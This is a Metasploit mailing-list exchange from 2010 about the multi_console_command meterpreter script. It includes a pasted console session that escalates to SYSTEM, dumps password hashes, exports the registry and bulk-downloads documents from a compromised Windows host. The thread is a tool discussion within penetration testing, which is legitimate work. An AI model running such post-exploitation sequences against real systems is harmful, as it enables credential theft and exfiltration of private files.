Metasploit mailing list archives
Re: multi_console_command script testdrive
From: Carlos Perez <carlos_perez () darkoperator com>
Date: Sat, 24 Apr 2010 14:01:00 -0400
Glad you liked it, I do have to say I might eliminate multiscript for this one, multicommand has the option of saving output to a file so it might be used like scraper or winenum for running specific commands and saving their output. Again thanks for the request and glad I could help
Carlos Sent from my Mobile PhoneOn Apr 24, 2010, at 1:24 PM, Sherif El-Deeb <archeldeeb () gmail com> wrote:
The multi_console_command script has been added as an answer to a request to run multiple meterpreter commands from a file, It's working perfectly "as expected of course" :)This script, IMHO, is the most useful one for post exploitation automation.Thank you Carlos, yet again. Sherif. ------------------------------------------------------------------ msf exploit(handler) > cat /root/test.rc [*] exec: cat /root/test.rc screenshot use priv getsystem run hashdump run scraper rev2self run search_dwld c:\\ free '.(jpg|doc|docx|xls|xlsx|pdf)$' msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > run multi_console_command -s /root/test.rc [*] Running Command List ... [*] Running command screenshot Screenshot saved to: /root/FFsygzcJ.jpeg [*] Running command use priv [*] Running command getsystem ...got system (via technique 1). [*] Running command run hashdump [*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY a2390068e5bxxxxx26caa0902ff21f8a...[*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:xxx:xxx::: Guest:501:xxx:xxx::: ... ... [*] Running command run scraper [*] New session on xx.211.145.145:54276... [*] Gathering basic system information...[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: 87[*] Obtaining the entire registry... [*] Exporting HKCU[*] Downloading HKCU (C:\Users\SHERIF~1\AppData\Local\Temp \LwPhbvul.reg)[*] Running command rev2self[*] Running command run search_dwld c:\\ free '.(jpg|doc|docx| xls|xlsx|pdf)$'Downloading 'c:\\1.jpg' to '/tmp/c_1.jpg' ... ... meterpreter > run checkvm [*] Checking if target is a Virtual Machine ..... [*] It appears to be physical host. meterpreter > ------------------------------------------------------------------ checkvm is fine.Side note: I noticed that the hash dumping process in the scraper script is not successful, even with system privs. "VistaSP2_x86", that's why I usually use "run hashdump" which works just fine._______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- multi_console_command script testdrive Sherif El-Deeb (Apr 24)
- Re: multi_console_command script testdrive Carlos Perez (Apr 24)